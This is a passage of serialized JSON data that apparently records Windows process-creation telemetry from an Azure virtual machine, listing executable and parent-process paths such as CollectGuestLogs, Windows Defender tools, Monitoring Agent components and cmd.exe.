\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WMIADAP.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\",\"C:\\\\Windows\\\\System32\\\\MpSigStub.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\